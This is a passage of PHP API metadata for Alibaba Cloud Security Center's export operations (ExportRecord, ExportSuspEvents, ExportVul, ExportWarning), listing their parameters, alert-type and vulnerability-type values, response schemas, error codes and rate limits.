\\"ExportId\\": 22,\\n \\"RequestId\\": \\"FFDFCEB3-A5EE-590A-8E70-283EBC5D****\\",\\n \\"DownloadUrl\\": \\"https://xxxxxxxx.oss-cn-hangzhou-1.aliyuncs.com/xxxxx/xxxxxxxxxxxxxx?Expires=1671448125&OSSAccessKeyId=xxx\\",\\n \\"UrlExpiredTime\\": 1673335497000,\\n \\"ExportDate\\": \\"2023-01-10\\",\\n \\"ReportId\\": 123,\\n \\"FileName\\": \\"test_xxxx.html\\",\\n \\"ExportStatus\\": \\"exporting\\"\\n}","type":"json"}]', 'title' => 'ExportCustomizeReport', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '1', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ExportCustomizeReport'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ExportCustomizeReport', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ExportRecord' => [ 'summary' => 'Exports detection results from various Cloud Security Center features, such as Asset Center, cloud platform configuration check, image security scan, attack analysis, and AK leakage detection, to an Excel file.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92283', 'abilityTreeNodes' => ['FEATUREsasAIJXMJ'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content in the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" ."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Params', 'in' => 'query', 'schema' => ['description' => 'The filter conditions for the exported content.'."\n" ."\n" .'> This is a general-purpose operation for exporting various detection lists from Cloud Security Center. As parameter configurations vary by feature, we recommend that you omit this parameter to export the complete list. You can then filter the data in the exported Excel file.', 'type' => 'string', 'required' => false, 'example' => '{"extend":"1","currentPage":1,"pageSize":10}', 'title' => ''], ], [ 'name' => 'ExportType', 'in' => 'query', 'schema' => ['description' => 'The type of records to export. Valid values:'."\n" ."\n" .'- **assetInstance**: The list of servers in Asset Center'."\n" ."\n" .'- **user**: The list of account asset fingerprints'."\n" ."\n" .'- **port**: The list of port asset fingerprints'."\n" ."\n" .'- **process**: The list of process asset fingerprints'."\n" ."\n" .'- **sca**: The list of middleware asset fingerprints'."\n" ."\n" .'- **database**: The list of database asset fingerprints'."\n" ."\n" .'- **web**: The list of web service asset fingerprints'."\n" ."\n" .'- **software**: The list of software asset fingerprints'."\n" ."\n" .'- **cron**: The list of scheduled task (cron) asset fingerprints'."\n" ."\n" .'- **autorun**: The list of startup item asset fingerprints'."\n" ."\n" .'- **lkm**: The list of kernel module asset fingerprints'."\n" ."\n" .'- **webserver**: The list of website asset fingerprints'."\n" ."\n" .'- **virusScanExport**: The list of virus scan task details'."\n" ."\n" .'- **imageVulExport**: The list of system vulnerabilities in images'."\n" ."\n" .'- imageVulExport: The list of system vulnerabilities in images'."\n" ."\n" .'- **imageBaseLineExport**: The list of image baseline check results'."\n" ."\n" .'- **imageAffectedMaliciousExport**: The list of malicious sample check results for images'."\n" ."\n" .'- **baselineCspm**: The list of cloud platform configuration check results'."\n" ."\n" .'- **attack**: The list of attack analysis alerts'."\n" ."\n" .'- **accessKey**: The list of AK leakage detection alerts'."\n" ."\n" .'- **exportObjectScanEvents**: The list of malicious file detection alerts'."\n" ."\n" .'- **domainDetail**: Website assets'."\n" ."\n" .'- **assetsPropertyScaProcessDetail**: RASP-protected processes'."\n" ."\n" .'- **exportHcWarning**: The list of system baseline risks'."\n" ."\n" .'- **raspAttackAlert**: The list of RASP attack alerts'."\n" ."\n" .'- **raspApplicationConfiguration**: The list of RASP application configurations'."\n" ."\n" .'- **raspWeaknessDetection**: The list of RASP weakness detection results'."\n" ."\n" .'- **raspInMemoryWebshellDetection**: The list of RASP alerts for in-memory webshell detection'."\n" ."\n" .'- **raspInMemoryWebshellInsertion**: The list of RASP alerts for in-memory webshell insertion'."\n" ."\n" .'- **listAgentExport**: The list of agents'."\n" ."\n" .'- **listSkillExport**: The list of skills'."\n" ."\n" .'- **listModelExport**: The list of models', 'type' => 'string', 'required' => true, 'example' => 'database', 'title' => ''], ], [ 'name' => 'ExportFileType', 'in' => 'query', 'schema' => ['description' => 'The type of file to export. Valid values:'."\n" ."\n" .'- **virusScanExport**: Exports details of a virus scan task. This parameter is required when ExportType is set to virusScanExport.', 'type' => 'string', 'required' => false, 'example' => 'virusScanExport', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The ID of the management account for a member in Resource Directory.'."\n" ."\n" .'> You can call the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1232428423234****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, used to locate and troubleshoot issues.', 'type' => 'string', 'example' => '6673D49C-A9AB-40DD-B4A2-B92306701AE7', 'title' => ''], 'FileName' => ['description' => 'The name of the exported file.', 'type' => 'string', 'example' => 'cms_20171101.xlsx', 'title' => ''], 'Id' => ['description' => 'The ID of the export task.', 'type' => 'integer', 'format' => 'int64', 'example' => '131231', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ['errorCode' => 'FreeVersionNotPermit', 'errorMessage' => 'Free version is not permitted.', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"6673D49C-A9AB-40DD-B4A2-B92306701AE7\\",\\n \\"FileName\\": \\"cms_20171101.xlsx\\",\\n \\"Id\\": 131231\\n}","type":"json"}]', 'title' => 'ExportRecord', 'description' => 'After you call this operation, you can call the [DescribeExportInfo](~~DescribeExportInfo~~) operation to query the export progress and retrieve the download URL for the exported Excel file.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ExportRecord'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:ExportRecord', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ExportSuspEvents' => [ 'summary' => 'Exports the information about exceptions to a file.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '106280', 'abilityTreeNodes' => ['FEATUREsasNB8R24'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request. The value of this parameter is specified by the system.'."\n", 'type' => 'string', 'required' => false, 'example' => '127.0.XX.XX', 'title' => ''], ], [ 'name' => 'Dealed', 'in' => 'query', 'schema' => ['description' => 'The status of the alert event. Valid values:'."\n" ."\n" .'* **N**: unhandled'."\n" .'* **Y**: handled'."\n", 'type' => 'string', 'required' => false, 'example' => 'Y', 'title' => ''], ], [ 'name' => 'TimeStart', 'in' => 'query', 'schema' => ['description' => 'The beginning of the time range during which the exception is detected.'."\n", 'type' => 'string', 'required' => false, 'example' => '2022-10-01 00:00:00', 'title' => ''], ], [ 'name' => 'TimeEnd', 'in' => 'query', 'schema' => ['description' => 'The end of the time range during which the exception is detected.'."\n", 'type' => 'string', 'required' => false, 'example' => '2022-12-05 00:00:00', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The complete name of the exception.'."\n", 'type' => 'string', 'required' => false, 'example' => 'WEBSHELL', 'title' => ''], ], [ 'name' => 'Levels', 'in' => 'query', 'schema' => ['description' => 'The severity of the alert event. Separate multiple severities with commas (,). Valid values:'."\n" ."\n" .'* **serious**'."\n" .'* **suspicious**'."\n" .'* **remind**'."\n", 'type' => 'string', 'required' => false, 'example' => 'serious,suspicious,remind', 'title' => ''], ], [ 'name' => 'ParentEventTypes', 'in' => 'query', 'schema' => ['description' => 'The alert type of the alert event. Valid values:'."\n" ."\n" .'* **Suspicious process**'."\n" .'* **Webshell**'."\n" .'* **Unusual logon**'."\n" .'* **Exception**'."\n" .'* **Sensitive file tampering**'."\n" .'* **Malicious process (cloud threat detection)**'."\n" .'* **Suspicious network connection**'."\n" .'* **Suspicious account**'."\n" .'* **Application intrusion event**'."\n" .'* **Cloud threat detection**'."\n" .'* **Precise defense**'."\n" .'* **Application whitelist**'."\n" .'* **Persistent webshell**'."\n" .'* **Web application threat detection**'."\n" .'* **Malicious script**'."\n" .'* **Threat intelligence**'."\n" .'* **Malicious network activity**'."\n" .'* **Cluster exception**'."\n" .'* **Webshell (on-premises threat detection)**'."\n" .'* **Vulnerability exploitation**'."\n" .'* **Malicious process (on-premises threat detection)**'."\n" .'* **Trusted exception**'."\n" .'* **Others**'."\n", 'type' => 'string', 'required' => false, 'example' => 'WEBSHELL', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The remarks.'."\n", 'type' => 'string', 'required' => false, 'example' => 'remark', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The handling status of the exception. Valid values:'."\n" ."\n" .'* **0**: all status'."\n" .'* **1**: pending handling'."\n" .'* **2**: ignored'."\n" .'* **4**: confirmed'."\n" .'* **8**: marked as false positive'."\n" .'* **16**: handling'."\n" .'* **32**: handled'."\n" .'* **64**: expired'."\n" .'* **128**: deleted'."\n", 'type' => 'string', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The data source of the exception. Set the value to sas.'."\n", 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the cluster that you want to query.'."\n" ."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to query the IDs of clusters.'."\n", 'type' => 'string', 'required' => false, 'example' => 'c4af4fdf38a98496a9b63c2be5dae****', 'title' => ''], ], [ 'name' => 'ContainerFieldName', 'in' => 'query', 'schema' => ['description' => 'The key of the condition that is used to query alert events on containers. Valid values:'."\n" ."\n" .'* **instanceId**: the ID of the asset'."\n" .'* **appName**: the name of the application'."\n" .'* **clusterId**: the ID of the cluster'."\n" .'* **regionId**: the ID of the region'."\n" .'* **nodeName**: the name of the node'."\n" .'* **namespace**: the namespace'."\n" .'* **clusterName**: the name of the cluster'."\n" .'* **image**: the name of the image'."\n" .'* **imageRepoName**: the name of the image repository'."\n" .'* **imageRepoNamespace**: the namespace to which the image repository belongs'."\n" .'* **imageRepoTag**: the tag that is added to the image'."\n" .'* **imageDigest**: the digest of the image'."\n", 'type' => 'string', 'required' => false, 'example' => 'clusterId', 'title' => ''], ], [ 'name' => 'ContainerFieldValue', 'in' => 'query', 'schema' => ['description' => 'The value of the condition that is used to query alert events on containers.'."\n", 'type' => 'string', 'required' => false, 'example' => 'c819391d2d520485fa3e81e2dc2ea****', 'title' => ''], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['description' => 'The dimension from which you want to configure the feature. Valid values:'."\n" ."\n" .'* **uuid**: the UUID of the asset'."\n" .'* **image_repo**: the ID of the image repository'."\n" .'* **Cluster**: the ID of the cluster'."\n", 'type' => 'string', 'required' => false, 'example' => 'uuid', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page. Default value: **20**.'."\n", 'type' => 'string', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return.'."\n", 'type' => 'string', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'AssetsTypeList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The types of assets.'."\n", 'type' => 'array', 'items' => ['description' => 'The types of assets.'."\n", 'type' => 'string', 'required' => false, 'example' => 'ECS', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The unique ID of the associated instance.'."\n", 'type' => 'string', 'required' => false, 'example' => '18b7336e-d469-473b-af83-8e5420f9****', 'title' => ''], ], [ 'name' => 'UniqueInfo', 'in' => 'query', 'schema' => ['description' => 'The unique key of the alert event.'."\n", 'type' => 'string', 'required' => false, 'example' => '1fbe8d16727f61d1478a674d6fa0****', 'title' => ''], ], [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The unique ID of the alert event.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '17821', 'title' => ''], ], [ 'name' => 'OperateErrorCodeList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The status codes of alert events.'."\n", 'type' => 'array', 'items' => ['description' => 'The status code of the alert event. Format: Operation type.Status code of the operation. The following operation types are supported:'."\n" ."\n" .'* **Common**: performs common operations.'."\n" .'* **deal**: handles the alert event.'."\n" .'* **ignore**: ignores the alert event.'."\n" .'* **offline_handled**: marks the alert as handled.'."\n" .'* **mark_mis_info**: marks the alert as a false positive by adding it to the whitelist.'."\n" .'* **rm_mark_mis_info**: cancels a false positive by removing the alert from the whitelist.'."\n" .'* **quara**: quarantines the source file of the malicious process.'."\n" .'* **kill_and_quara**: terminates the malicious process and quarantines the source file.'."\n" .'* **kill_virus**: deletes the source file of the malicious process.'."\n" .'* **block_ip**: blocks the source IP address.'."\n" .'* **manual_handled**: manually handles the alert event.'."\n" .'* **advance_mark_mis_info**: adds the alert event to the whitelist that is configured for precise defense.'."\n" .'* **advance_mark_mis_info.System**: automatically adds the alert event to the whitelist that is configured for precise defense.'."\n" .'* **advance_mark_mis_info.User**: manually adds the alert event to the whitelist that is configured for precise defense.'."\n" ."\n" .'The following status codes are supported:'."\n" ."\n" .'* **Success**: The operation is successful.'."\n" .'* **Failure**: The operation fails.'."\n" .'* **AgentOffline**: The agent is offline.'."\n", 'type' => 'string', 'required' => false, 'example' => 'ignore. Success', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'GroupId', 'in' => 'query', 'schema' => ['description' => 'The ID of the asset group.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '9454789', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => 'EF145C20-6A19-529A-8BDD-0671DXXXXXX', 'title' => ''], 'FileName' => ['description' => 'The name of the exported file.'."\n", 'type' => 'string', 'example' => 'suspicious_event_20221209', 'title' => ''], 'Id' => ['description' => 'The ID of the export record of the anomalous event.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ['errorCode' => 'FreeVersionNotPermit', 'errorMessage' => 'Free version is not permitted.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"EF145C20-6A19-529A-8BDD-0671DXXXXXX\\",\\n \\"FileName\\": \\"suspicious_event_20221209\\",\\n \\"Id\\": 1\\n}","type":"json"}]', 'title' => 'ExportSuspEvents', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ExportSuspEvents'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:ExportSuspEvents', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ExportVul' => [ 'summary' => 'Exports a vulnerability list.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '103350', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- zh: Chinese'."\n" .'- en: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of vulnerabilities to export. Valid values:'."\n" ."\n" .'- **cve**: Linux software vulnerability'."\n" .'- **sys**: Windows system vulnerability'."\n" .'- **cms**: Web-CMS vulnerability'."\n" .'- **app**: application vulnerability'."\n" .'- **emg**: emergency vulnerability', 'type' => 'string', 'required' => true, 'example' => 'app', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUIDs of the servers to query for vulnerabilities. Separate multiple UUIDs with commas (,).', 'type' => 'string', 'required' => false, 'example' => '1587bedb-fdb4-48c4-9330-****', 'title' => ''], ], [ 'name' => 'AliasName', 'in' => 'query', 'schema' => ['description' => 'The name of the vulnerability.', 'type' => 'string', 'required' => false, 'example' => 'RHSA-2019:3197-Important: sudo security update', 'title' => ''], ], [ 'name' => 'Necessity', 'in' => 'query', 'schema' => ['description' => 'The priority of the vulnerability to query. Separate multiple priorities with commas (,). Valid values:'."\n" ."\n" .'- **asap**: high'."\n" .'- **later**: medium'."\n" .'- **nntf**: low', 'type' => 'string', 'required' => false, 'example' => 'asap', 'title' => ''], ], [ 'name' => 'Dealed', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the vulnerability is fixed. Valid values:'."\n" ."\n" .'- **y**: fixed'."\n" .'- **n**: not fixed', 'type' => 'string', 'required' => false, 'example' => 'n', 'title' => ''], ], [ 'name' => 'GroupId', 'in' => 'query', 'schema' => ['description' => 'The ID of the asset group to which the server with the vulnerability belongs.'."\n" .'> Call the [DescribeAllGroups](~~DescribeAllGroups~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '8834224', 'title' => ''], ], [ 'name' => 'SearchTags', 'in' => 'query', 'schema' => ['description' => 'Filters results by label. Valid values:'."\n" ."\n" .''."\n" .'- Restart required'."\n" .'- Remote utilization'."\n" .'- EXP exists'."\n" .'- Exploitable'."\n" .'- Privilege escalation'."\n" .'- Code execution'."\n" .''."\n" ."\n" .''."\n" .'- **Restart required**'."\n" .'- **Remote utilization**'."\n" .'- **EXP exists**'."\n" .'- **Available**'."\n" .'- **Elevation of Privilege**'."\n" .'- **Code Execution**'."\n" ."\n" .'', 'type' => 'string', 'required' => false, 'example' => 'Restart required', 'title' => ''], ], [ 'name' => 'AttachTypes', 'in' => 'query', 'schema' => ['description' => 'The additional vulnerability type when querying application vulnerabilities. This parameter is required when Type is set to app. The value is fixed as **sca**.'."\n" ."\n" .'> If this parameter is set to **sca**, both application vulnerabilities (**app** type) and software composition analysis (**sca** type) vulnerabilities are queried. If this parameter is not set, only application vulnerabilities are queried.', 'type' => 'string', 'required' => false, 'example' => 'sca', 'title' => ''], ], [ 'name' => 'VpcInstanceIds', 'in' => 'query', 'schema' => ['description' => 'The instance IDs of the VPC-connected instances to query for vulnerabilities. Separate multiple IDs with commas (,).'."\n" .'> Invoke the [DescribeVpcList](~~DescribeVpcList~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'ins-133****,ins-5414****', 'title' => ''], ], [ 'name' => 'CveId', 'in' => 'query', 'schema' => ['description' => 'The CVE ID.', 'type' => 'string', 'required' => false, 'example' => 'CVE-2022-44702', 'title' => ''], ], [ 'name' => 'Path', 'in' => 'query', 'schema' => ['description' => 'The path of the process affected by the vulnerability.', 'type' => 'string', 'required' => false, 'example' => '/etc/test', 'title' => ''], ], [ 'name' => 'ContainerName', 'in' => 'query', 'schema' => ['description' => 'The name of the container affected by the vulnerability.', 'type' => 'string', 'required' => false, 'example' => 'xxljob-7b87597b99-mcskr', 'title' => ''], ], [ 'name' => 'ImageName', 'in' => 'query', 'schema' => ['description' => 'The name of the image affected by the vulnerability.', 'type' => 'string', 'required' => false, 'example' => 'container-***:****', 'title' => ''], ], [ 'name' => 'CreateTsStart', 'in' => 'query', 'schema' => ['description' => 'The start of the time range during which the first scan was performed.'."\n" .'> The value is a UNIX timestamp. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1696128144000', 'title' => ''], ], [ 'name' => 'CreateTsEnd', 'in' => 'query', 'schema' => ['description' => 'The end of the time range during which the first scan was performed.'."\n" .'> The value is a UNIX timestamp. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1696186800000', 'title' => ''], ], [ 'name' => 'RaspDefend', 'in' => 'query', 'schema' => ['description' => 'Specifies whether runtime application self-protection (RASP) supports real-time protection against the vulnerability. Valid values:'."\n" ."\n" .'- **0**: Not supported.'."\n" .'- **1**: Supported.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'VulEntityList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The list of vulnerability component information.', 'type' => 'array', 'items' => [ 'title' => '', 'description' => 'The vulnerability component information.', 'type' => 'object', 'properties' => [ 'EntityVersion' => ['title' => '', 'description' => 'The version of the component.', 'type' => 'string', 'example' => '1.0.0', 'required' => false], 'EntityName' => ['title' => '', 'description' => 'The name of the component.', 'type' => 'string', 'example' => 'Ollama', 'required' => false], ], 'required' => false, 'example' => '', ], 'required' => false, 'maxItems' => 100, 'example' => '', ], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the resource directory account.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'required' => false], ], [ 'name' => 'AssetType', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The asset type where the vulnerability is detected. Separate multiple types with commas (,). Valid values:'."\n" .'- **ECS**: host asset'."\n" .'- **CONTAINER**: container asset', 'type' => 'string', 'required' => false, 'example' => 'ECS'], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response for exporting a vulnerability list.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'E1FAB2B8-DF4D-55DF-BC3D-5C3CA6FD5B13', 'title' => ''], 'FileName' => ['description' => 'The name of the exported file.', 'type' => 'string', 'example' => 'app_20211101', 'title' => ''], 'Id' => ['description' => 'The ID of the exported file.', 'type' => 'integer', 'format' => 'int64', 'example' => '81634', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'FreeVersionNotPermit', 'errorMessage' => 'Free version is not permitted.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"E1FAB2B8-DF4D-55DF-BC3D-5C3CA6FD5B13\\",\\n \\"FileName\\": \\"app_20211101\\",\\n \\"Id\\": 81634\\n}","type":"json"}]', 'title' => 'Export vulnerability list', 'description' => 'Exports a vulnerability list. You can export vulnerability lists for Linux software vulnerabilities, Windows system vulnerabilities, Web-CMS vulnerabilities, application vulnerabilities, and emergency vulnerabilities.'."\n" ."\n" .'This operation is used together with the DescribeVulExportInfo operation. After you call this operation to create a vulnerability export task, call the [DescribeVulExportInfo](~~DescribeVulExportInfo~~) operation with the export task ID to check the progress of the export task.'."\n" ."\n" .'### QPS limit'."\n" .'The single-user QPS limit for this operation is 10 calls per second. If the number of calls per second exceeds the limit, throttling is triggered. This may affect your business. Manage your calls appropriately.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ExportVul'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [], ], 'ExportWarning' => [ 'summary' => 'Exports baseline check results.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => true, 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '106282', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '192.0.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server whose baseline check results you want to export. Separate multiple UUIDs with commas (,).'."\n", 'type' => 'string', 'required' => false, 'example' => 'inet-7c676676-06fa-442e-90fb-b802e****,inet-7c676676-06fa-442e-90fb-b****', 'title' => ''], ], [ 'name' => 'TypeName', 'in' => 'query', 'schema' => ['description' => 'The type of the baseline based on which baseline checks are performed.'."\n" ."\n" .'> You must set the value of this parameter to the value of the **TypeName** parameter that is returned by calling the [DescribeRiskType](~~DescribeRiskType~~) operation. If both the **TypeName** and **TypeNames** parameters are specified, only the **TypeName** parameter takes effect.'."\n", 'type' => 'string', 'required' => false, 'example' => 'hc_container', 'title' => ''], ], [ 'name' => 'TypeNames', 'in' => 'query', 'schema' => ['description' => 'The types of the baselines based on which baseline checks are performed. Separate multiple types with commas (,).'."\n" ."\n" .'> You must set the value of this parameter to the value of the **TypeName** parameter that is returned by calling the [DescribeRiskType](~~DescribeRiskType~~) operation. If both the **TypeName** and **TypeNames** parameters are specified, only the **TypeName** parameter takes effect.'."\n", 'type' => 'string', 'required' => false, 'example' => 'hc_container,cis', 'title' => ''], ], [ 'name' => 'SubTypeNames', 'in' => 'query', 'schema' => ['description' => 'The subtypes of the baselines based on which baseline checks are performed. Separate multiple subtypes with commas (,).'."\n" ."\n" .'> You must set the value of this parameter to the value of the **TypeName** parameter that is contained in the **SubTypes** parameter. You can call the [DescribeRiskType](~~DescribeRiskType~~) operation to obtain the value of the TypeName parameter.'."\n", 'type' => 'string', 'required' => false, 'example' => 'hc_middleware_ack_master', 'title' => ''], ], [ 'name' => 'RiskLevels', 'in' => 'query', 'schema' => ['description' => 'The severity of the baseline check item. Separate multiple severities with commas (,). Valid values:'."\n" ."\n" .'* **high**'."\n" .'* **medium**'."\n" .'* **low**'."\n", 'type' => 'string', 'required' => false, 'example' => 'high,medium', 'title' => ''], ], [ 'name' => 'StatusList', 'in' => 'query', 'schema' => ['description' => 'The status of the check item in the baseline check results. Separate multiple statuses with commas (,). Valid values:'."\n" ."\n" .'* **3**: passed'."\n" .'* **1**: failed'."\n", 'type' => 'string', 'required' => false, 'example' => '1,3', 'title' => ''], ], [ 'name' => 'RiskName', 'in' => 'query', 'schema' => ['description' => 'The name of the baseline.'."\n", 'type' => 'string', 'required' => false, 'example' => 'Alibaba Cloud Standard - Windows 2016/2019 Security Baseline', 'title' => ''], ], [ 'name' => 'Dealed', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the baseline risks are handled. Valid values:'."\n" ."\n" .'* **Y**: yes'."\n" .'* **N**: no'."\n", 'type' => 'string', 'required' => false, 'example' => 'N', 'title' => ''], ], [ 'name' => 'IsSummaryExport', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the baseline check results are aggregated and exported. Valid values:'."\n" ."\n" .'* **0**: no'."\n" 